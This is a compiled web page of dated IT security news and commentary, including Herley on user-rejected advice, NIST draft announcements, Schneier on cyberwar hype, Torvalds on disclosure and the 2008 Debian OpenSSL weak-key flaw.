Better advice might produce a different outcome. This is better than the alternative hypothesis that users are irrational. This suggests that security advice that has compelling cost-benefit trade off has real chance of user adoption. However, the costs and benefits have to be those the user cares about, not those we think the user ought to care about. “
Herley offers the following advice to help us get out of this mess:
- We need an estimate of the victimization rate for any exploit when designing appropriate security advice. Without this we end up doing worst-case risk analysis.
- User education is a cost borne by the whole population, while offering benefit only to the fraction that fall victim. Thus the cost of any security advice should be in proportion to the victimization rate.
- Retiring advice that is no longer compelling is necessary. Many of the instructions with which we burden users do little to address the current harms that they face.
- We must prioritize advice. In trying to defend everything we end up defending nothing. When we provide long lists of unordered advice we abdicate all opportunity to have influence and abandon users to fend for themselves.
- We must respect users’ time and effort. Viewing the user’s time as worth $2.6 billion an hour is a better starting point than valuing it at zero.
Final thoughts
The big picture idea I am taking away from Dr. Herley’s paper is that users have never been offered security. All the advice, policies, directives, and what not offered in the name of IT security only promotes reduced risk. Could changing that be the paradigm shift needed to get information security on track?
I want to thank Dr. Cormac Herley for his thought-provoking paper and e-mail conversation
[Apr 21, 2009] SP 800-118 DRAFT Guide to Enterprise Password Management
Apr. 21, 2009 | NIST
NIST announces that Draft Special Publication (SP) 800-118, Guide to Enterprise Password Management, has been released for public comment. SP 800-118 is intended to help organizations understand and mitigate common threats against their character-based passwords. The guide focuses on topics such as defining password policy requirements and selecting centralized and local password management solutions.
NIST requests comments on draft SP 800-118 by May 29, 2009. Please submit comments to [email protected] with "Comments SP 800-118" in the subject line.
draft-sp800-118.pdf (181 KB)
Threat of 'cyberwar' has been hugely hyped - CNN.com by Bruce Schneier.
Editor's note: Bruce Schneier is a security technologist and author of "Beyond Fear: Thinking Sensibly About Security in an Uncertain World." Read more of his writing at http://www.schneier.com/
(CNN) -- There's a power struggle going on in the U.S. government right now.
It's about who is in charge of cyber security, and how much control the government will exert over civilian networks. And by beating the drums of war, the military is coming out on top.
"The United States is fighting a cyberwar today, and we are losing," said former NSA director -- and current cyberwar contractor -- Mike McConnell. "Cyber 9/11 has happened over the last ten years, but it happened slowly so we don't see it," said former National Cyber Security Division director Amit Yoran. Richard Clarke, whom Yoran replaced, wrote an entire book hyping the threat of cyberwar.
General Keith Alexander, the current commander of the U.S. Cyber Command, hypes it every chance he gets. This isn't just rhetoric of a few over-eager government officials and headline writers; the entire national debate on cyberwar is plagued with exaggerations and hyperbole.
Googling those names and terms -- as well as "cyber Pearl Harbor," "cyber Katrina," and even "cyber Armageddon" -- gives some idea how pervasive these memes are. Prefix "cyber" to something scary, and you end up with something really scary.
Cyberspace has all sorts of threats, day in and day out. Cybercrime is by far the largest: fraud, through identity theft and other means, extortion, and so on. Cyber-espionage is another, both government- and corporate-sponsored. Traditional hacking, without a profit motive, is still a threat. So is cyber-activism: people, most often kids, playing politics by attacking government and corporate websites and networks.
These threats cover a wide variety of perpetrators, motivations, tactics, and goals. You can see this variety in what the media has mislabeled as "cyberwar." The attacks against Estonian websites in 2007 were simple hacking attacks by ethnic Russians angry at anti-Russian policies; these were denial-of-service attacks, a normal risk in cyberspace and hardly unprecedented.
A real-world comparison might be if an army invaded a country, then all got in line in front of people at the DMV so they couldn't renew their licenses. If that's what war looks like in the 21st century, we have little to fear.
Similar attacks against Georgia, which accompanied an actual Russian invasion, were also probably the responsibility of citizen activists or organized crime. A series of power blackouts in Brazil was caused by criminal extortionists -- or was it sooty insulators? China is engaging in espionage, not war, in cyberspace. And so on.
One problem is that there's no clear definition of "cyberwar." What does it look like? How does it start? When is it over? Even cybersecurity experts don't know the answers to these questions, and it's dangerous to broadly apply the term "war" unless we know a war is going on.
Yet recent news articles have claimed that China declared cyberwar on Google, that Germany attacked China, and that a group of young hackers declared cyberwar on Australia. (Yes, cyberwar is so easy that even kids can do it.) Clearly we're not talking about real war here, but a rhetorical war: like the war on terror.
We have a variety of institutions that can defend us when attacked: the police, the military, the Department of Homeland Security, various commercial products and services, and our own personal or corporate lawyers. The legal framework for any particular attack depends on two things: the attacker and the motive. Those are precisely the two things you don't know when you're being attacked on the Internet. We saw this on July 4 last year, when U.S. and South Korean websites were attacked by unknown perpetrators from North Korea -- or perhaps England. Or was it Florida?
We surely need to improve our cybersecurity. But words have meaning, and metaphors matter. There's a power struggle going on for control of our nation's cybersecurity strategy, and the NSA and DoD are winning. If we frame the debate in terms of war, if we accept the military's expansive cyberspace definition of "war," we feed our fears.
We reinforce the notion that we're helpless -- what person or organization can defend itself in a war? -- and others need to protect us. We invite the military to take over security, and to ignore the limits on power that often get jettisoned during wartime.
If, on the other hand, we use the more measured language of cybercrime, we change the debate. Crime fighting requires both resolve and resources, but it's done within the context of normal life. We willingly give our police extraordinary powers of investigation and arrest, but we temper these powers with a judicial system and legal protections for citizens.
We need to be prepared for war, and a Cyber Command is just as vital as an Army or a Strategic Air Command. And because kid hackers and cyber-warriors use the same tactics, the defenses we build against crime and espionage will also protect us from more concerted attacks. But we're not fighting a cyberwar now, and the risks of a cyberwar are no greater than the risks of a ground invasion. We need peacetime cyber-security, administered within the myriad structure of public and private security institutions we already have.
The opinions expressed in this commentary are solely those of Bruce Schneier.
[Apr 14, 2009] Security Software Protection or Extortion by Rick Broida and Robert Vamosi,
April 13, 2009 | PC World
As the Conficker worm sprang to life on April 1, talk here at the PC World offices turned to some interesting debates about how best to protect PCs from malware threats. In recent weeks we've run several helpful articles offering tips, tricks, and insights to keep you and your PC safe from Conficker and other malware on the Internet. At the same time, a few among us have revealed that they don't run any security software at all on their own machines--and have no intention of starting now.
Shocking as it may sound, there are plenty of experienced, knowledgeable technophiles out there who laugh in the face of danger as they traipse unprotected through the wilds of the online world. Among them is our own Hassle-Free PC blogger Rick Broida, who prefers what he deems the relatively minor threat of malware to the annoyance of intrusive, nagging security apps.
Is he insane? Naïve? To find out, we gave Rick a podium to speak on behalf of those who shrug off the safety of antimalware suites, and to defend his point of view in a debate with security correspondent Robert Vamosi, who regularly reports on malware and other security threats for PC World's Business Center. Who's right? Who's nuts? You be the judge. Share your view in our comments section.
First up, Rick Broida presents his assertion that security suites are an unnecessary nuisance compared with the threat of malware.
Rick Broida: We Don't Need No Stinking Security Software
Security software is a scam. A rip-off. A waste of money, a pain in the neck, and a surefire way to bring even the speediest PC to a crawl. Half the time it seems to cause more problems than it solves. Oh, and one more thing: It's unnecessary.
Heresy? Crazy talk? Recipe for disaster? No, no, and no. For the past several years, I've run Windows (first XP, and now Vista) without a single byte of third-party security software. No ZoneAlarm. No Norton Internet Security. No Spyware Doctor. Not even freebie favorite Avast Home Edition. I use nothing but the tools built into Windows and a few tricks I've learned.
Want to know how much time I've spent cleaning up after viruses, spyware, rootkits, Trojan horses, keyloggers, and other security breaches? None. I'll say that again: none.
Maybe I'm asking for trouble (that sound you hear is fellow PC World columnist Rob Vamosi nodding furiously), but after years of infection-free computing, I have no qualms about my methods. Your mileage may vary, and I make no guarantees. But if you want to rid your system of pricey, performance-choking security software, read on.
My first line of defense is my router. Like most, it has a built-in firewall that blocks all unauthorized traffic and makes my network more or less invisible to the outside world. The second line of defense is Windows. XP, Vista, and 7 have built-in firewalls that help protect against "inside" attacks, such as if a friend were to come over with his spyware-infected laptop and connect to my network.
Of course, a router can't stop viruses, phishing, and other threats that arrive via e-mail. My secret weapon: Gmail. As I noted in "Use Gmail to Fight Spam," I route mail from my personal domain to my Gmail account. (From there, I can access messages on the Web or pull them down via Outlook.) Gmail does a phenomenal job filtering spam--much of which is malware. The service also performs a virus scan on all attachments.
By using Gmail as an intermediary between my POP3 server and my PC, I've kept not only spam at bay, but malware as well. I don't know whether Windows Live Mail and Yahoo Mail offer similar amenities, but for me Gmail is a slam-dunk solution. Even phishing messages are few and far between. Of course, as an educated user, I know better than to click a link in a message filled with scary come-ons ("Your account has been compromised!").
Speaking of phishing, the latest versions of Firefox and Internet Explorer offer robust antiphishing tools. Both will sound the alarm if I attempt to visit sites known to be fraudulent, meaning that even if I click something that looks like, say, a totally legit PayPal or eBay link, I'll get fair warning. And that's just the tip of the safe-browser iceberg: Firefox and IE are way more secure than in the old days. They block pop-ups, provide Web site ID checks, protect against malware installation, and so on.
As for other threats, I'm comfortable leaving my PC in the capable hands of Windows Defender. Microsoft's antispyware tool runs quietly and efficiently in the background. I "check in" once in a while to make sure it's active and up-to-date, but otherwise I never hear a peep from it.
Of course, that could mean bad stuff is slipping past Defender, right? Sure, it's possible. That's why I occasionally run a system scan using Ad-Aware or Malwarebytes Anti-Malware. (I'm not completely insane, after all.) So far, so good: The scans always come up empty.
Last but not least, I exercise common sense. I don't open e-mail attachments from people I don't know. I don't download files from disreputable or unknown sources. I don't visit Web sites that peddle gambling, porn, torrents, or "warez." (Yeah, I know, I'm boring.) In other words, I keep my Internet nose clean, which in turn keeps my PC clean.
At the same time, I make sure that automatic updates are turned on for Windows, my Web browsers, and any other software that gets patched regularly. And, perhaps most important of all, I rely on multiple backup methods just in case my system really is compromised somehow. For example, my Firefox bookmarks are all synced to the Web via Xmarks (formerly Foxmarks). I use the online-backup service Mozy to archive my critical documents and Outlook PST file. And drive-cloning utility Casper makes a weekly copy of my entire hard drive to a second drive.
Ladies and gentlemen of the security-software jury, I rest my case. My only real evidence is Exhibit A: me. After several years with XP and about six months with Vista, I'm still cruising along without a security care in the world. So, are you going to lock me up or accept me as your new messiah? Either way, I'm good.
Next up, security correspondent Robert Vamosi argues the opposing view.
[Feb 27, 2009] NIST Computer Security Division released 2 draft publications
(Special Publication & NIST Interagency Report) today and 1 Mark-up
Copy of Draft SP --
1. Mark-up copy of Draft Special Publication (SP) 800-53 Revision 3
2. Draft Special Publication 800-81 Revision 1
3. Draft NIST Interagency Report (IR) 7517
1. Draft SP 800-53 Rev. 3: Recommended Security Controls for Federal Information Systems and Organizations
The following document provides a line-by-line (mark-up copy) comparison between SP 800-53, Revision 2 and Draft SP 800-53, Revision 3. It should also be noted that the section of the publication addressing scoping considerations for scalability, was inadvertently omitted from the public draft and will be reinstated in the final publication.
URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-53_Rev3
******
2. Draft SP 800-81 Rev. 1: Secure Domain Name System (DNS) Deployment Guide
NIST has drafted a new version of the document "Secure Domain Name System (DNS) Deployment Guide (SP 800-81)". This document, after a review and comment cycle will be published as NIST SP 800-81r1. There will be two rounds of public comments and this is our posting for the first one. Federal agencies and private organizations as well as individuals are invited to review the draft Guidelines and submit comments to NIST by sending them to [email protected] before March 31, 2009. Comments will be reviewed and posted on the CSRC website.
All comments will be analyzed, consolidated, and used in revising the draft Guidelines before final publication.
Reviewers of the draft revised Guidelines should note the following differences and additions:
(1) Updated Recommendations for all cryptographic operations relating to digital signing of DNS records, verification of the signatures, Zone Transfer, Dynamic Updates, key Management and Authenticated Denial of Existence.
(2) The additional IETF RFC documents that have formed the basis for the updated recommendations include: DNNSEC Operational Practices
(RFC 4641), Automated Updates for DNS Security (DNSSEC) Trust Anchors
(RFC 5011), DNS Security (DNSSEC) Hashed Authenticated Denial of
Existence (RFC 5155) and HMAC SHA TSIG Algorithm Identifiers (RFC 4635).
(3) The FIPS standards and NIST guidelines incorporated into the updated recommendations include: The Keyed-Hash Message Authentication Code (HMAC) (FIPS 198-1), Digital Signature Standard (FIPS 186-3) and Recommendations for Key Management (SP 800-57P1 & SP 800-57P3).
(4) Illustration of Secure configuration examples using DNS
Software offering NSD, in addition to BIND.
URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-81-rev1
[Feb 17, 2009] SP 800-53, Revision 3 DRAFT Recommended Security Controls for Federal Information Systems and Organizations
NIST announces the release of the Initial Public Draft (IPD) of Special Publication 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations. This is the first major update of Special Publication 800-53 since its initial publication in December 2005. We have received excellent feedback from our customers during the past three years and have taken this opportunity to provide significant improvements to the security control catalog. In addition, the changing threat environment and growing sophistication of cyber attacks necessitated specific changes to the allocation of security controls and control enhancements in the low-impact, moderate-impact, and high-impact baselines. We also continue to work closely with the Department of Defense and the Office of the Director of National Intelligence under the auspices of the Committee on National Security Systems on the harmonization of security control specifications across the federal government. And lastly, we have added new security controls to address organization-wide security programs and introduced the concept of a security program plan to capture security program management requirements for organizations. The privacy-related material, originally scheduled to be included in Special Publication 800-53, Revision 3, will undergo a separate public review process in the near future and be incorporated into this publication, when completed. Comments will be accepted until March 27, 2009. Comments should be forwarded via email to [email protected].
Draft-SP800-53 Rev.3.pdf (2,112 KB)
Cisco study IT security policies unfair - Network World by By Jim Duffy ,
A better term for "unfair security policy" would be a "bureaucratic perversion". The level of detachment from reality is really crucial and can vary from "no clue" to "parallel universe". But the key element is "not do any harm". That's why extremely unfair security policies are often called administrative fascism.
Unfair policies prompt most employees to break company IT security rules, and that could lead to lost customer data, a Cisco study found.
Cisco this week released a second set of findings from a global study on data leakage. The first part dealt with common employee data leakage risks and the potential impact on the collaborative workforce.
Part two deals with the ‘whys’ of behavior that raises the risk of corporate data leakage. More than half of the employees surveyed admitted that they do not always adhere to corporate security polices.
And when they don’t, it can lead to leakage of sensitive data. Of the IT respondents who dealt with employee policy violations, one in five reported that incidents resulted in lost customer data, according to the Cisco study.
The surveys were conducted of more than 2,000 employees and IT professionals in 10 countries: the United States, the United Kingdom, France, Germany, Italy, Japan, China, India, Australia and Brazil. They were executed by InsightExpress, a U.S.-based market research firm, and commissioned by Cisco.
The study found that the majority of employees believe their companies’ IT security policies are unfair. Indeed, surveyed employees said the top reason for non-compliance is the belief that policies do not align with the reality of what they need to do their jobs, according to Cisco.
The study found that the majority of employees in eight of 10 countries felt their company’s policies were unfair. Only employees in Germany and the United States did not agree.
In Germany, even though the majority of employees felt their companies’ policies were fair, more than half of them said they would break rules to complete their jobs, the study found. Of all the countries, France (84%) has the most employees who admitted defying policies, whether rarely or routinely.
In India, one in 10 employees admitted never or hardly ever abiding by corporate security policies. Overall, the study found that 77% of companies had security policies in place.
But defiance may not be intentional. IT and employees have a disconnect when it comes to policy and adherence awareness, the study found.
IT believes employees defy policies for a variety of reasons, from failing to grasp the magnitude of security risks to apathy; employees say they break them because they do not align with the ability to do their jobs.
But IT could do a better job communicating those policies. The study found that, depending on the country, the number of IT professionals who knew a policy existed was 20% to 30% higher than the number of employees.
Torvalds: Fed up with the security circus By Ellen Messmer
"A lot of activity [in various security camps] stems from public-relations posturing." "What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.
Creator of the Linux kernel explains why he finds security people to be so anathema 08/14/2008 , Network World Linus Torvalds, creator of the Linux kernel, says he's fed up with what he sees as a "security circus" surrounding software vulnerabilities and how they're hyped by security people.Torvalds explained his position in an e-mail exchange with Network World this week. He also expanded on critical comments he made last month that caused a stir in the IT industry.
Last month Torvalds stated in an online posting that "one reason I refuse to bother with the whole security circus is that I think it glorifies -- and thus encourages -- the wrong behavior. It makes 'heroes' out of security people, as if the people who don't just fix normal bugs aren't as important. In fact, all the boring normal bugs are way more important, just because there's a lot more of them."
Never one to mince words, Torvalds also lobbed a verbal charge at the OpenBSD community: "I think the OpenBSD crowd is a bunch of masturbating monkeys, in that they make such a big deal about concentrating on security to the point where they pretty much admit that nothing else matters to them."
This week Torvalds -- who says the only person involved in the OpenBSD community with whom he talked to about the "monkeys" barb found it funny -- acknowledges others probably found it offensive.
Via e-mail, he also explains why he finds security people to be so anathema.
Too often, so-called "security" is split into two camps: one that believes in nondisclosure of problems by hiding knowledge until a bug is fixed, and one that "revels in exposing vendor security holes because they see that as just another proof that the vendors are corrupt and crap, which admittedly mostly are," Torvalds states.
Torvalds went on to say he views both camps as "crazy."
"Both camps are whoring themselves out for their own reasons, and both camps point fingers at each other as a way to cement their own reason for existence," Torvalds asserts. He says a lot of activity in both camps stems from public-relations posturing.
He says neither camp is absolutely right in any event, and that a middle course, based on fixing things as early as possible without a lot of hype, is preferable.
"You need to fix things early, and that requires a certain level of disclosure for the developers," Torvalds states, adding, "You also don't need to make a big production out of it."
Torvalds also says he doesn't care for labeling updates and changes to Linux as a security fix in a security advisory.
"What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.
It's better to avoid sticking solely to either "full and immediate disclosure" or ignoring bugs that might embarrass vendors, he points out. "Any situation that allows the vendor to sit on the bug for weeks or months is unacceptable, as is any situation that makes it harder for people who find problems to talk to technical people."
Torvalds says he's skeptical about the value of synchronized releases among vendors that favor the idea of an embargo of software vulnerability information until a fix from a vendor is ready.
That process discourages thinking about design changes to make it harder to have security bugs, Torvalds says. "So, the whole 'embargoes are good' mentality is just corruption from the vendors," he states. "But on the other hand, disclosure should not be the goal."
"I don’t believe in either camp," Torvalds concludes. What he does favor is to "have a model where security is easier to do in the first place -- that is, the Unix model -- but make it easy for people to report bugs with no embargo, but privately."
He says the Linux kernel security list "is private" in the sense that "we don't need to leak things out further" to get some software issue fixed. He says the process allows, though doesn't encourage, a five-day embargo, and "even then, I will forward it to technical people on an 'as needed' basis, because even that embargo secrecy is not some insane absolute thing."
Comments
Some people ...By Anonymous on August 17, 2008, 2:31 pm
I can't believe the genius behind Linux referred to proactively fixing all bugs, regardless of security implications as "masturbating", since that's quite obviously...
[May 16, 2008] Linux gets security black eye
May 16, 2008
As has been widely reported, the maintainers of Debian's OpenSSL packages made some errors recently that have potentially compromised the security of any sshd-equipped system used remotely by Debian users. System administrators may wish to purge authorized_key files of public keys generated since 2006 by affected client machines.
Simply using a Debian-based machine to access a remote server via SSH would not be enough to put the machine at risk. However, if the user copied a public key generated on a Debian-based system to the remote server, for example to take advantage of the higher security offered by password-free logins, then the weak key could make the server susceptible to brute-force attacks, especially if the user's name is easily guessable.
Administrators of servers that run SSH may wish to go through users' authorized key files (typically ~/.ssh/authorized_keys), deleting any that may have been affected. A "detector" script, available here, appears to compare public key signatures against a list of just 262,800 entries. That in turn suggests that if the user's name is known, a brute force attack progressing at one guess per second could succeed within 73 hours (262,800 seconds).
A full explanation of the problem can be found here. In a nutshell, Debian's OpenSSL maintainers made some Debian-specific patches that, according to subscriber-only content at LWN.net, were aimed at fixing a memory mapping error that surfaced during testing with the valgrind utility. The unintended consequence was a crippling of the randomness of keys, making them predictable, and thus possible to guess using "brute-force" attacks. And unfortunately, the Debian maintainers failed to submit their patches upstream, and thus the problem did not surface until very recently (there's certainly a lesson to be learned, there). Not surprisingly, brute force attacks are way up this week, LWN.net also reported.
Users of Debian and Debian-based distributions such as Ubuntu should immediately upgrade the SSH software on their systems. The new ssh-client package will contain an "ssh-vulnkey" utility that, when run, checks the user's keys for the problem. Users should re-generate any affected keys as soon as possible.
Also possibly affected are "OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections," though not apparently Keys generated with GnuPG or GNUTLS. More details can be found here (Debian resource page), as well as on this webpage, which also links to lists of common keys and brute-force scripts that boast of 20-minute typical break-in times.
[May 16, 2008] Practical Technology " Open-Source Security Idiots
The key mechanism is really alarming.
Sometimes, people do such stupid things that words almost fail me. That’s the case with a Debian ‘improvement’ to OpenSSL that rendered this network security program next to useless in Debian, Ubuntu and other related Linux distributions.OpenSSL is used to enable SSL (Secure Socket Layer) and TLS (Transport Layer Security) in Linux, Unix, Windows and many other operating systems. It also includes a general purpose cryptography library. OpenSSL is used not only in operating systems, but in numerous vital applications such as security for Apache Web servers, OpenVPN for virtual private networks, and in security appliances from companies like Check Point and Cisco.
Get the picture? OpenSSL isn’t just important, it’s vital, in network security. It’s quite possible that you’re running OpenSSL even if you don’t have a single Linux server within a mile of your company. It’s that widely used.
Now, OpenSSL itself is still fine. What’s anything but fine is any Linux, or Linux-powered device, that’s based on Debian Linux OpenSSL code from September 17th, 2006 until May 13, 2008.
What happened? This is where the idiot part comes in. Some so-called Debian developer decided to ‘fix’ OpenSSL because it was causing the Valgrind code analysis tool and IBM’s Rational Purify runtime debugging tool to produce warnings about uninitialized data in any code that was linked to OpenSSL. This ‘problem’ and its fix have been known for years. That didn’t stop our moronic developer from fixing it on his own by removing the code that enabled OpenSSL to generate truly random numbers..
After this ‘fix,’ OpenSSL on Debian systems could only use one of a range from 1 to 32,768—the number of possible Linux process identification numbers—as the ‘random’ number for its PRNG (Pseudo Random Number Generator). For cryptography purposes, a range of number like that is a bad joke. Anyone who knows anything about cracking can work up a routine to automatically bust it within a few hours.
Why didn’t the OpenSSL team catch this problem? They didn’t spot it because they didn’t see it. You see Debian developers have this cute habit of keeping their changes to themselves rather than passing them upstream to any program’s actual maintainers. Essentially, what Debian ends up doing is forking programs. There’s the Debian version and then there’s the real version.
Usually, it’s a difference that makes no difference. Sometimes, it just shows how pig-headed Debian developers can be. My favorite case of this is when they decided that rather than allow Mozilla to have control of the logo in the Firefox browser, because that wasn’t open enough according to the Debian Social Contract, they forked Firefox into their own version: Iceweasel.
That was just stupid. This is stupid and it’s put untold numbers of users at risk for security attacks.
First, the mistake itself was something that only a programming newbie would have made and I have no idea how this ever got passed by the Debian code maintainers. This is first-year programming assignment. “What is a random number generator and how do you make one?”
Then, insult to injury, because Debian never passed its ‘fix’ on to OpenSSL, the people who would have caught the problem at a glance, this sloppy, insecure mess has now been used on hundreds of thousands, if not millions, of servers, PCs, and appliances.
This isn’t just bad. This is Microsoft security bad.
Now, there’s a fix for Debian 4.0 Etch and its development builds. Ubuntu, which is based on Debian,, also have fixes for it. In Ubuntu, the versions that need patches are Ubuntu 7.04, Feisty; Ubuntu 7.10, Gutsy; the just released Ubuntu 8.04 LTS Hardy, and the developer builds of Ubuntu Intrepid Ibex.
Debian has also opened a site on how to rollover your insecure security keys to the better ones once you’ve installed the corrected software.. For more on how to fix your system, see Fixing Debian OpenSSL on my ComputerWorld blog, Cyber Cynic.
[May 14, 2008] Securing the net-the fruits of incompetence
[May 8, 2008] National Checklist Program Repository
30814 CVE Vulnerabilities 160 Checklists 141 US-CERT Alerts 2192 US-CERT Vuln Notes 3259 OVAL Queries
[May 8, 2008] CWE - Common Weakness Enumeration
[May 8, 2008] http://csrc.nist.gov/publications/PubsDrafts.html#800-123
Reasonably well-written draft. Good strcture. Uneven coverage of topics (weak for "6.4.1. vulnerability scanning (question of false positives is swiped under the carpet. Good list of additional documents on page D2.
Draft SP 800-123, Guide to General Server Security, is available for public comment.
This document is intended to assist organizations in installing, configuring, and maintaining secure servers. SP 800-123 makes recommendations for securing a server's operating system and server software, as well as maintaining the server's secure configuration through application of appropriate patches and upgrades, security testing, log monitoring, and backups of data and operating system files.
The document addresses common servers that use general operating systems and are deployed in both outward-facing and inward-facing locations.
Comments need to be received by June 13, 2008.
[Apr 23, 2008] Semantic Gap
Posted by kdawson on Wednesday April 23, @08:03AM
from the stand-and-identify dept. captcha_fun writes"Researchers at Penn State have developed a patent-pending image-based CAPTCHA technology for next-generation computer authentication. A user is asked to pass two tests: (1) click the geometric center of an image within a composite image, and (2) annotate an image using a word selected from a list. These images shown to the users have fake colors, textures, and edges, based on a sequence of randomly-generated parameters. Computer vision and recognition algorithms, such as alipr, rely on original colors, textures, and shapes in order to interpret the semantic content of an image. Because of the endowed power of imagination, even without the correct color, texture, and shape information, humans can still pass the tests with ease. Until computers can 'imagine' what is missing from an image, robotic programs will be unable to pass these tests. The system is called IMAGINATION and you can try it out."
This sounds promising given how broken current CAPTCHA technology is.
[Dec 28, 2007] http://csrc.nist.gov/publications/PubsSPs.html#800-53_Rev2
December 28, 2007 | NIST
NIST announces the release of Special Publication 800-53, Revision 2, Recommended Security Controls for Federal Information Systems. This special update incorporates guidance on appropriate safeguards and countermeasures for federal industrial control systems.
NIST’s Computer Security Division (Information Technology Laboratory) and Intelligent Systems Division (Manufacturing Engineering Laboratory), in collaboration with the Department of Homeland Security and organizations within the federal government that own, operate, and maintain industrial control systems, developed the necessary industrial control system augmentations and interpretations for the security controls, control enhancements, and supplemental guidance in Special Publication 800-53.
The industrial control system augmentations and interpretations for Special Publication 800-53 will facilitate the employment of appropriate safeguards and countermeasures for these specialized information systems that are part of the critical infrastructure of the United States.
The changes to Special Publication 800-53, Revision 1 in updating to Revision 2, include:
- a new Appendix I, Industrial Control Systems;
- an updated low security control baseline with the addition of security control CP-4, Contingency Plan Testing and Exercises; and
- an updated Appendix A, References Section.
The regular two-year update to Special Publication 800-53 will occur, as previously scheduled, in December 2008.
[Nov 14, 2006] Configuring Java Applications to Use Solaris Security.
[Nov 14, 2006] Draft SP 800-115, Technical Guide to Information Security Testing.
Draft SP 800-115, Technical Guide to Information Security Testing, is available for public comment. It seeks to assist organizations in planning and conducting technical information security testing, analyzing findings, and developing mitigation strategies. The publication provides practical recommendations for designing, implementing, and maintaining technical information security testing processes and procedures. SP 800-115 provides an overview of key elements of security testing, with an emphasis on technical testing techniques, the benefits and limitations of each technique, and recommendations for their use. Draft SP 800-115 is intended to replace SP 800-42, Guideline on Network Security Testing, which was released in 2003. Please visit the drafts page to learn how to submit comments to this draft document.
[Nov 01, 2006] Hillary Clinton's private server was open to 'low-skilled-hackers'
[Nov 1, 2006] Operational Security Capabilities for IP Network Infrastructure (opsec) Charter
- Framework for Operational Security Capabilities for IP Network Infrastructure (41497 bytes)
- Security Best Practices Efforts and Documents (59589 bytes)
- Operational Security Current Practices (90632 bytes)
- Filtering and Rate Limiting Capabilities for IP Network Infrastructure (44099 bytes)
- Service Provider Infrastructure Security (38329 bytes)
- Routing Control Plane Security Capabilities (40431 bytes)
- Logging Capabilities for IP Network Infrastructure (44543 bytes)
[May 4, 2006] Draft Special Publication 800-80, Guide for Developing Performance Metrics for Information Security
Adobe PDF (762 KB)
NIST's Computer Security Division has completed the initial public draft of Special Publication 800-80, Guide for Developing Performance Metrics for Information Security.
This guide is intended to assist organizations in developing metrics for an information security program. The methodology links information security program performance to agency performance. It leverages agency-level strategic planning processes and uses security controls from NIST SP 800-53, Recommended Security Controls for Federal Information Systems, to characterize security performance. To facilitate the development and implementation of information security performance metrics, the guide provides templates, including at least one candidate metric for each of the security control families described in NIST SP 800-53.
[Aug 15, 2005] Draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form
Adobe pdf (1,153 KB)
The NIST Computer Security Division is pleased to announce for your review and comment draft NIST Special Publication 800-26 Revision 1, Guide for Information Security Program Assessments and System Reporting Form. This draft document brings the assessment process up to date with key standards and guidelines developed by NIST.
Please provide comments by October 17, 2005 to [email protected]. Comment period has been closed.
[Sept 11, 2004] http://secinf.net/unix_security/
A useful list of security papers, tutorials and FAQs. Looks like created in 2002 and never updated since.
Computer Security: Art and Science. Matt Bishop, University of California - Davis ISBN: 0-201-44099-7 Addison Wesley: 2003 Cloth; 1136 pp. Published: 12/02/2002 US: $74.99
Expensive and dull book that can be used for torturing CS students :-). Attempt of broad coverage that definitely might help to killing any interest to computer security for most students...
Description Table of Contents Appropriate Courses Preface Sample Chapter About the Author(s)
eSecurity Planet: Trends: Updated Open Source Security Testing ...
... Updated Open Source Security Testing Manual Available By Paul Desmond. Version 2
of the Open Source Security Testing Methodology Manual (OSSTMM) was posted on ...
The sky is not falling By Dev Zaborav
Recently, notifications started going out regarding a number of critical vulnerabilities in BIND, the software that powers the majority of the name servers on the Internet. In an attempt to convey the importance of these holes, many computer security experts were referring to this as the next major Internet bug -- drawing near-panicked comparisons to the massive, widespread BIND attacks of 1998. Many even went to the point of proclaiming that this incident will be the next great Internet-crippling bug.
To an extent, the concern over the announcement of the BIND vulnerabilities is valid. The Internet works as we know it because when we type a site into our browsers or email clients, name servers translate that site's name into numbers that can be routed. Without functioning name servers, the Internet becomes a much different world. Imagine having to identify friends by their telephone numbers rather than by their names. The vulnerabilities that were released at the end of January could allow attackers to take down or take control of the majority of name servers on the Internet. It was imperative that server administrators be notified as soon as possible and alerted as to the crucial nature of this problem. They were notified promptly.
However, by the time the advisories reached many security experts and members of the press, the discussions had taken on a tone of hysteria. Before the advisory was made public, the root name servers -- those that disseminate name information to the rest of the Internet's name servers -- had already been patched. It remains for system administrators on the rest of the Internet to upgrade their servers ... and many large providers and corporations reacted quickly and appropriately. At this point, the majority of Internet backbone providers have upgraded their servers.
The possibility that these vulnerabilities will take down the entire Internet is an unlikely one at best. To prove how drastic a bug this is, many experts pointed to the 1998 BIND hole, which was indeed one of the most persistently exploited vulnerabilities on the Net for a long, long time. What the experts fail to mention, however, is that at the time, the Red Hat distribution of Linux set up BIND without prompting at installation. Many Linux users didn't know they were running BIND, so they didn't think they needed to apply the patch when it became available. It's no longer the case that Red Hat installs BIND automatically; there will be fewer servers running BIND unnecessarily or unknowingly, so this vulnerability will be less prevalent. Despite their widespread effect, the great BIND attacks of 1998 didn't cause the Internet to shut down. The Internet continued along just fine, except for a few hundred compromised servers and defaced Web pages, which hardly affect the functionality of the Internet as a whole.
Another incident that experts and journalists have used to display how overwhelming this set of vulnerabilities could be occurred in late January when Microsoft's Web pages were unavailable for several hours due to a DNS problem (http://abcnews.go.com/sections/scitech/DailyNews/microsoft010125.html). While it's true that this is an example of a Website being inaccessible due to a problem with name servers, the instance is otherwise unrelated to the BIND problem. Microsoft's name servers don't run BIND, and by all indications the troubles they suffered two weeks ago were in no way similar to those caused by the holes in BIND. The constant comparison, clearly intended to heighten concern about the destruction of the entire Internet if name servers go down, smacks of sensationalism.
eveloperWorks/Linux Security: Improving the security of open UNIX platforms -- simple MD5 checking shell script(bash) by Igor Maximov ([email protected]). Nothing special.
[Dec 28, 2000] NSA Security-Enhanced Linux
